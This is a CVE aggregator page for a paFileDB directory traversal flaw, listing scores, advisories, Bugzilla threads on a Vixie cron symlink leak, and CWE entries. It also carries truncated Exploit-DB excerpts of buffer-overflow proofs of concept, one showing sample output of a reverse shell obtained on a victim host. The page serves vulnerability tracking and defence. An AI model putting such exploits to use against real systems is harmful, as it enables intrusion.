CVE-2005-2001
published 2005-06-15CVE-2005-2001: Directory traversal vulnerability in pafiledb.php in paFileDB 3.1 and earlier allows remote attackers to include arbitrary files via a .. (dot dot) in the…
PriorityP425medium5CVSS 2.0
AVNACLAuNCPINAN
EPSS
1.79%
75.6th percentile
Directory traversal vulnerability in pafiledb.php in paFileDB 3.1 and earlier allows remote attackers to include arbitrary files via a .. (dot dot) in the action parameter.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php_arena | pafiledb | — | — |
| php_arena | pafiledb | — | — |
| php_arena | pafiledb | — | — |
| php_arena | pafiledb | — | — |
| php_arena | pafiledb | — | — |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vendor_redhat2.1LOW
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-92m4-g4mr-whg7: Directory traversal vulnerability in pafiledb
ghsa_unreviewed·2022-05-01
CVE-2005-2001 [MEDIUM] GHSA-92m4-g4mr-whg7: Directory traversal vulnerability in pafiledb
Directory traversal vulnerability in pafiledb.php in paFileDB 3.1 and earlier allows remote attackers to include arbitrary files via a .. (dot dot) in the action parameter.
Red Hat
security flaw
vendor_redhat·2005-04-06·CVSS 2.1
CVE-2005-1038 [LOW] security flaw
security flaw
crontab in Vixie cron 4.1, when running with the -e option, allows local users to read the cron files of other users by changing the file being edited to a symlink. NOTE: there is insufficient information to know whether this is a duplicate of CVE-2001-0235.
Statement: Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
No detection rules found.
Exploit-DB
e-Post SPA-PRO 4.01 - 'imap' Remote Buffer Overflow
exploitdb·2005-06-02
CVE-2005-1903 e-Post SPA-PRO 4.01 - 'imap' Remote Buffer Overflow
e-Post SPA-PRO 4.01 - 'imap' Remote Buffer Overflow
---
//**************************************************************************
// e-Post SPA-PRO Mail @Solomon SPA-IMAP4S 4.01 Service Buffer Overflow
// Vulnerability
//
// Bind Shell POC Exploit for Japanese Win2K SP4
// 31 May 2005
//
// This POC code binds shell on port 2001 of a vulnerable e-Post
// SPA-PRO Mail @Solomon IMAP server.
//
// This POC assumes default mailbox configuration C:\mail\inbox\%USERNAME%
// Any changes to the mailbox configuration will cause this POC to
// fail due to the length differences.
//
//
// Advisory
// http://www.security.org.sg/vuln/spa-promail4.html
// http://www.security.org.sg/vuln/spa-promail4-jp.html
//
//**************************************************************************
#include
#i
Exploit-DB
Yager 5.24 - Remote Buffer Overflow
exploitdb·2005-04-25
CVE-2005-1163 Yager 5.24 - Remote Buffer Overflow
Yager 5.24 - Remote Buffer Overflow
---
/*
*
* Yager > 1
* --[ sending handshake [UDP]...done!
* --[ reading server response [UDP]...done!
* --[ server port: 1089
* --[ connecting to 192.168.2.100:1089 [TCP]...done!
* --[ exploiting WinXP Pro SP1 GER
* --[ ret: 0x300686bd [ jmp esp in binkw32.dll ]
* --[ exploiting packet overflow...
* --[ sending packet...done!
* --[ starting reverse handler [port: 1337]...done!
* --[ incomming connection from: 192.168.2.100
* --[ b0x pwned - h4ve phun
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\Yager>
*
*/
#include
#include
#include
#include
#define PORT_UDP 34855
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
/*
*
*
Bugzilla
CVE-2005-1038 security flaw
bugzilla·2018-08-16·CVSS 2.1
CVE-2005-1038 [LOW] CVE-2005-1038 security flaw
CVE-2005-1038 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
crontab in Vixie cron 4.1, when running with the -e option, allows local users to read the cron files of other users by changing the file being edited to a symlink. NOTE: there is insufficient information to know whether this is a duplicate of CVE-2001-0235.
---
Statement:
Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
Bugzilla
CVE-2005-2933 imap buffer overflow
bugzilla·2006-03-05·CVSS 7.5
CVE-2005-2933 [HIGH] CVE-2005-2933 imap buffer overflow
CVE-2005-2933 imap buffer overflow
Remote exploitation of a buffer overflow vulnerability in the University
of Washington's IMAP Server (UW-IMAP) allows attackers to execute
arbitrary code. (quote from iDefense advisory, see
http://www.idefense.com/intelligence/vulnerabilities/display.php?type=vulnerabilities&id=313)
All versions of imap < imap-2004g are affected. This includes RHL 7.3, RHL 9,
and probably most FC versions.
RH used the following patch to fix the issue in RHEL 2.1:
--snip--
Fix for CAN-2005-2933, from iDefense's advisory.
diff -uNr imap-2001a/src/c-client/mail.c imap-2004g/src/c-client/mail.c
--- imap-2001a/src/c-client/mail.c 2001-11-13 14:29:07.000000000 -0500
+++ imap-2004g/src/c-client/mail.c 2005-09-15 12:57:07.000000000 -0400
@@ -587,8 +587,10 @@
if (c == '=') { /
Bugzilla
CAN-2005-1038 vixie-cron information leak
bugzilla·2005-07-21·CVSS 2.1
CVE-2001-0235 [LOW] CAN-2005-1038 vixie-cron information leak
CAN-2005-1038 vixie-cron information leak
+++ This bug was initially created as a clone of Bug #162022 +++
+++ This bug was initially created as a clone of Bug #154920 +++
crontab in Vixie cron 4.1, when running with the -e option, allows local users
to read the cron files of other users by changing the file being edited to a
symlink. NOTE: there is insufficient information to know whether this is a
duplicate of CVE-2001-0235.
http://www.securityfocus.com/archive/1/395093
Discussion:
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solut
Bugzilla
CVE-2005-1038 vixie-cron information leak
bugzilla·2005-06-29·CVSS 2.1
CVE-2005-1038 [LOW] CVE-2005-1038 vixie-cron information leak
CVE-2005-1038 vixie-cron information leak
+++ This bug was initially created as a clone of Bug #154920 +++
crontab in Vixie cron 4.1, when running with the -e option, allows local users
to read the cron files of other users by changing the file being edited to a
symlink. NOTE: there is insufficient information to know whether this is a
duplicate of CVE-2001-0235.
http://www.securityfocus.com/archive/1/395093
Discussion:
Our current fix for this issue is not complete. A race condition still exists
between the time we lstat the file in question, and when we open the file.
---
This is now fixed with vixie-cron-4.1-8.EL3, available from:
http://people.redhat.com/~jvdias/cron/RHEL-3/4.1-8.EL3
The race condition has been circumvented: the fopen() is done as
the non-root user, which also f
Bugzilla
CAN-2005-1038 vixie-cron information leak
bugzilla·2005-04-20·CVSS 2.1
CVE-2001-0235 [LOW] CAN-2005-1038 vixie-cron information leak
CAN-2005-1038 vixie-cron information leak
+++ This bug was initially created as a clone of Bug #154922 +++
+++ This bug was initially created as a clone of Bug #154920 +++
crontab in Vixie cron 4.1, when running with the -e option, allows local users
to read the cron files of other users by changing the file being edited to a
symlink. NOTE: there is insufficient information to know whether this is a
duplicate of CVE-2001-0235.
http://www.securityfocus.com/archive/1/395093
Discussion:
Oups...only applies to 4.1 which is not included <= FC2
Bugzilla
CAN-2005-1038 vixie-cron information leak
bugzilla·2005-04-14·CVSS 2.1
CVE-2001-0235 [LOW] CAN-2005-1038 vixie-cron information leak
CAN-2005-1038 vixie-cron information leak
crontab in Vixie cron 4.1, when running with the -e option, allows local users
to read the cron files of other users by changing the file being edited to a
symlink. NOTE: there is insufficient information to know whether this is a
duplicate of CVE-2001-0235.
http://www.securityfocus.com/archive/1/395093
Discussion:
This issue should also affect RHEL2.1 and RHEL3
---
Actually, in RHEL-3, vixie-cron-3.0.1-76 would not have this problem,
becuase it used fstat(fd,&st) on the same original file descriptor
for the file that was unlinked by the attack; since the modification
time had not changed, it would print
'crontab: no changes made to crontab'
and would not install the link as the new crontab.
Because this version crontab did not re-open the f
Bugzilla
CAN-2005-1038 vixie-cron information leak
bugzilla·2005-04-14·CVSS 2.1
CVE-2001-0235 [LOW] CAN-2005-1038 vixie-cron information leak
CAN-2005-1038 vixie-cron information leak
+++ This bug was initially created as a clone of Bug #154920 +++
crontab in Vixie cron 4.1, when running with the -e option, allows local users
to read the cron files of other users by changing the file being edited to a
symlink. NOTE: there is insufficient information to know whether this is a
duplicate of CVE-2001-0235.
http://www.securityfocus.com/archive/1/395093
Discussion:
This is fixed with vixie-cron-4.1-33_FC3, FC-3 update #320 .
---
No errata covers the FC-3 update #320 - this problem is fixed with
vixie-cron-4.1-33_FC3
and in
FC4's vixie-cron-4.1-33
CWE
Improper Preservation of Permissions
mitre_cwe·CVSS 7.8
[HIGH] CWE-281 Improper Preservation of Permissions
CWE-281: Improper Preservation of Permissions
The product does not preserve permissions or incorrectly preserves permissions when copying, restoring, or sharing objects, which can cause them to have less restrictive permissions than intended.
Modes of Introduction:
Phase: Implementation
Note: REALIZATION: This weakness is caused during implementation of an architectural security tactic.
Phase: Operation
Common Consequences:
Scope: Confidentiality, Integrity. Impact: Read Application Data, Modify Application Data.
Observed Examples:
CVE-2002-2323: Incorrect ACLs used when restoring backups from directories that use symbolic links.
CVE-2001-1515: Automatic modification of permissions inherited from another file system.
CVE-2005-1920: Permissions on backup file are created with defaults,
CWE
Cleartext Storage of Sensitive Information in Executable
mitre_cwe·CVSS 2.1
[LOW] CWE-318 Cleartext Storage of Sensitive Information in Executable
CWE-318: Cleartext Storage of Sensitive Information in Executable
The product stores sensitive information in cleartext in an executable.
Attackers can reverse engineer binary code to obtain secret data. This is especially easy when the cleartext is plain ASCII. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information.
Modes of Introduction:
Phase: Implementation
Common Consequences:
Scope: Confidentiality. Impact: Read Application Data.
Observed Examples:
CVE-2005-1794: Product stores RSA private key in a DLL and uses it to sign a certificate, allowing spoofing of servers and Adversary-in-the-Middle (AITM) attacks.
CVE-2001-1527: administration passwords in cleartext in executa
http://marc.info/?l=bugtraq&m=111885787217807&w=2http://www.gulftech.org/?node=research&article_id=00082-06142005http://www.phparena.net/http://www.phparena.net/pafiledb_patch/http://marc.info/?l=bugtraq&m=111885787217807&w=2http://www.gulftech.org/?node=research&article_id=00082-06142005http://www.phparena.net/http://www.phparena.net/pafiledb_patch/
2005-06-15
Published